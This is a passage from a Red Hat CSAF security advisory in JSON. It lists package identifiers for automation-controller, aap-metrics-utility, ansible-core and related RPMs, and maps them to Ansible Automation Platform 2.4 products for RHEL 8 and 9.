"name": "automation-controller-0:4.5.8-1.el9ap.s390x",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.s390x",
"product_id": "automation-controller-0:4.5.8-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.s390x",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.s390x",
"product_id": "automation-controller-0:4.5.8-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=s390x"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=s390x"
}
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"product": {
"name": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"product_id": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el9ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"product": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"product_id": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/aap-metrics-utility@0.3.0-1.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"product": {
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"product_id": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller@4.5.8-1.el8ap?arch=aarch64"
}
}
},
{
"category": "product_version",
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"product": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"product_id": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"product_identification_helper": {
"purl": "pkg:rpm/redhat/automation-controller-venv-tower@4.5.8-1.el8ap?arch=aarch64"
}
}
}
],
"category": "architecture",
"name": "aarch64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el8ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.aarch64"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.s390x"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el8ap.x86_64"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el8ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.aarch64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.s390x"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.src"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el8ap.x86_64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:ansible-core-1:2.15.12-1.el8ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:ansible-test-1:2.15.12-1.el8ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.aarch64"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.s390x"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.src",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-0:4.5.8-1.el8ap.x86_64"
},
"product_reference": "automation-controller-0:4.5.8-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-cli-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-server-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-server-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.5.8-1.el8ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-ui-0:4.5.8-1.el8ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.5.8-1.el8ap.noarch",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.aarch64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.ppc64le",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.s390x",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 8",
"product_id": "8Base-Ansible-Automation-Platform-2.4:automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el8ap.x86_64",
"relates_to_product_reference": "8Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-core-1:2.15.12-1.el9ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:ansible-test-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.aarch64"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.s390x"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.src"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-0:4.5.8-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-0:4.5.8-1.el9ap.x86_64"
},
"product_reference": "automation-controller-0:4.5.8-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-cli-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-cli-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-cli-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-server-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-server-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-server-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-ui-0:4.5.8-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-ui-0:4.5.8-1.el9ap.noarch"
},
"product_reference": "automation-controller-ui-0:4.5.8-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.ppc64le",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.s390x",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1:automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64"
},
"product_reference": "automation-controller-venv-tower-0:4.5.8-1.el9ap.x86_64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Developer-1.1"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-core-1:2.15.12-1.el9ap.src as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-core-1:2.15.12-1.el9ap.src"
},
"product_reference": "ansible-core-1:2.15.12-1.el9ap.src",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "ansible-test-1:2.15.12-1.el9ap.noarch as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2:ansible-test-1:2.15.12-1.el9ap.noarch"
},
"product_reference": "ansible-test-1:2.15.12-1.el9ap.noarch",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4-Inside-1.2"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64 as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
"product_id": "9Base-Ansible-Automation-Platform-2.4:aap-metrics-utility-0:0.3.0-1.el9ap.aarch64"
},
"product_reference": "aap-metrics-utility-0:0.3.0-1.el9ap.aarch64",
"relates_to_product_reference": "9Base-Ansible-Automation-Platform-2.4"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "aap-metrics-utility-0:0.3.0-1.el9ap.ppc64le as a component of Red Hat Ansible Automation Platform 2.4 for RHEL 9",
